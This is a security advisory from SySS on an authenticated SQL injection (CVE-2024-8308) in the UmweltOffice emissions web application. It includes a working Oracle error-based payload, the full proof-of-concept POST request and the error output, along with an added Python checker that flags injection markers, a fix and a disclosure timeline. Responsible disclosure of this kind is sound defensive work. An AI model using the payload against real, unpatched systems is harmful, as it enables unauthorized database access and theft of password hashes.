Advisory ID: SYSS-2024-074
Product: UmweltOffice
Manufacturer: Siempelkamp NIS Ingenieurgesellschaft mbH
Affected Version(s): <7.4.3
Tested Version(s): 7.4.1
Vulnerability Type: SQL Injection (CWE-89)
Risk Level: High
Solution Status: Fixed
Manufacturer Notification: 2024-08-28
Solution Date: 2024-11-11
Public Disclosure: 2024-11-25
CVE Reference: CVE-2024-8308
Authors of Advisory: Johannes Lauinger and Fidelis Abt, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

UmweltOffice by Siempelkamp NIS Ingenieurgesellschaft mbH is a system to
continuously monitor emission data and make it available in the form of
a web application. The application is also used to report emission data
to the respective authorities.

The manufacturer describes the product as follows (see [1]):

"TALAS/7 with the UmweltOffice® V.7 PC system is a complete, networkable
system for continuous acquisition, storage and analysis of emissions
data through all branches of industry according to the Technical
Instructions on Air Quality Control (TA-Luft), 13., 17., 27., 30. and
44. BImSchV - (German emission safety regulations)."

Due to improper handling of HTTP request input data, the web application
contains an SQL injection vulnerability. The affected functionality is
reachable only after logging in to the application with any valid
credentials (including low-privileged accounts), making this an
authenticated SQL injection vulnerability.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

After logging in to the application, it is possible to access stored
notifications. This functionality is reached by first opening the menu
item "Input" ("Eingabe") and then "Notifications" ("Mitteilungen").
Notifications are shown in a list which can be filtered. To edit the
filter, the button "Edit Filter" ("Filter bearbeiten") is used.
This opens an input form with different filter options. Updating the
filter options results in an HTTP POST request being sent to the server.
This request is vulnerable to both error-based and time-based boolean
blind SQL injection in the following fields:

* filterBkbId
* filterAkbId
* filterMkbId

The vulnerability allows accessing the underlying Oracle DBMS and
exfiltrating all data, including the salted password hashes of all
users.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The Oracle database version banner can be retrieved by setting the value
'filterBkbId' for the POST request '/emission/auswerten_mitteilungen.do'
as follows:

filterBkbId=1)) AND 42=DBMS_UTILITY.SQLID_TO_SQLHASH((SELECT banner FROM v$version FETCH FIRST 1 ROWS ONLY)) AND ((1=1

The full POST request sent to the application is shown in the following
listing, where the 'Host' and 'Content-Length' header values as well as
the session token have been redacted:

POST /emission/auswerten_mitteilungen.do HTTP/1.1
Content-Length: XXX
Host: xxx.xxx.xxx.xxx
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

filterAnwenden=false&formid=frmFilter&radioZeit=mz&filterZeitVonString=2024-07-21&filterArtId=0&filterBkbId=1))+AND+42%3dDBMS_UTILITY.SQLID_TO_SQLHASH((SELECT+banner+FROM+v$version+FETCH+FIRST+1+ROWS+ONLY))+AND+((1%3d1&filterZeitBisString=2024-08-22&filterStatusId=1&filterAkbId=%2A12&filterDurchId=36&filterMkbId=-1&btnFilterAnwenden=clicked&btnBerichtPDF=&btnBerichtTXT=

The relevant part of the response returned by the application is shown
in the following:

Fehler in der Datenbankabfrage: ORA-13797: Ungültige SQL-ID angegeben, Oracle Database 12c Standard Edition Release 12.2.0.1.0 - 64bit Production ORA-06512: in "SYS.DBMS_UTILITY", Zeile 1271

In this case, the database version used is Oracle Database 12c Standard
Edition Release 12.2.0.1.0 (64 bit).
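As an added example that is not part of the advisory, the following Python checker decodes a form-encoded body of the request shown above and flags the three filter id fields whenever a value is not a plain id or contains Oracle SQL markers; this is the kind of check a WAF rule or log review would apply on the defender's side. The accepted id shape (optional '*', optional '-', digits) is an assumption derived from the benign values in the listing, and the benign sample body is constructed.

```python
import re
from urllib.parse import parse_qs

# The three filter parameters the advisory names as injectable.
FILTER_ID_FIELDS = ("filterBkbId", "filterAkbId", "filterMkbId")

# Assumed legitimate shape of an id filter: optional '*' prefix, optional
# minus sign, then digits ('1', '*12', '-1' appear in the advisory's request).
# This is an assumption for this example, not the vendor's validation rule.
ID_FILTER_RE = re.compile(r"^\*?-?\d+$")

# Oracle-specific tokens typical for error-based / time-based injection
# attempts; a plain id filter never contains any of them.
SQL_MARKERS = re.compile(
    r"(DBMS_UTILITY|DBMS_LOCK|DBMS_PIPE|UTL_INADDR|v\$version"
    r"|\bSELECT\b|\bUNION\b|\bAND\b|\bOR\b|['()])",
    re.IGNORECASE,
)

# Request body from the advisory's PoC listing (shown on the page).
POC_BODY = (
    "filterAnwenden=false&formid=frmFilter&radioZeit=mz&filterZeitVonString="
    "2024-07-21&filterArtId=0&filterBkbId=1))+AND+42%3dDBMS_UTILITY."
    "SQLID_TO_SQLHASH((SELECT+banner+FROM+v$version+FETCH+FIRST+1+ROWS+ONLY))"
    "+AND+((1%3d1&filterZeitBisString=2024-08-22&filterStatusId=1&filterAkbId="
    "%2A12&filterDurchId=36&filterMkbId=-1&btnFilterAnwenden=clicked"
)

# Constructed benign body with the same fields and ordinary filter values.
BENIGN_BODY = (
    "filterAnwenden=false&formid=frmFilter&radioZeit=mz&filterZeitVonString="
    "2024-07-21&filterArtId=0&filterBkbId=1&filterZeitBisString=2024-08-22"
    "&filterStatusId=1&filterAkbId=%2A12&filterDurchId=36&filterMkbId=-1"
)


def inspect_body(body: str) -> dict:
    """Return {field: {"value": decoded, "markers": [...]}} for suspicious ids.

    A field is reported when its decoded value does not match the assumed id
    shape or when it contains any SQL marker; an empty dict means clean.
    """
    findings = {}
    params = parse_qs(body, keep_blank_values=True)  # decodes '+' and %XX
    for field in FILTER_ID_FIELDS:
        for value in params.get(field, []):
            markers = sorted({m.upper() for m in SQL_MARKERS.findall(value)})
            if markers or not ID_FILTER_RE.match(value):
                findings[field] = {"value": value, "markers": markers}
    return findings


if __name__ == "__main__":
    print("benign:", inspect_body(BENIGN_BODY))
    print("poc:   ", inspect_body(POC_BODY))
```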
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Upgrade to UmweltOffice version 7.4.3.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-08-21: Vulnerability discovered
2024-08-28: Vulnerability reported to manufacturer
2024-11-11: Patch released by manufacturer
2024-11-25: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for UmweltOffice
    https://www.siempelkamp-nis.com/en/products-and-services/environmental-systems-and-emission-monitoring/environment-systems/translate-to-englisch-talas/
[2] SySS Security Advisory SYSS-2024-074
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-074.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Johannes Lauinger and Fidelis
Abt of SySS GmbH.

E-Mail: johannes.lauinger@syss.de
Public Key: https://www.syss.de/kontakt/pgp-keys
Key Fingerprint: 3F79 A293 AE08 0A92 65EB 25D2 C431 4DF6 22D6 0262

E-Mail: fidelis.abt@syss.de
Public Key: https://www.syss.de/kontakt/pgp-keys
Key Fingerprint: A5BA AD2D E1A3 EBEB F43B A99C D3BE 05CA 41B7 1781

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en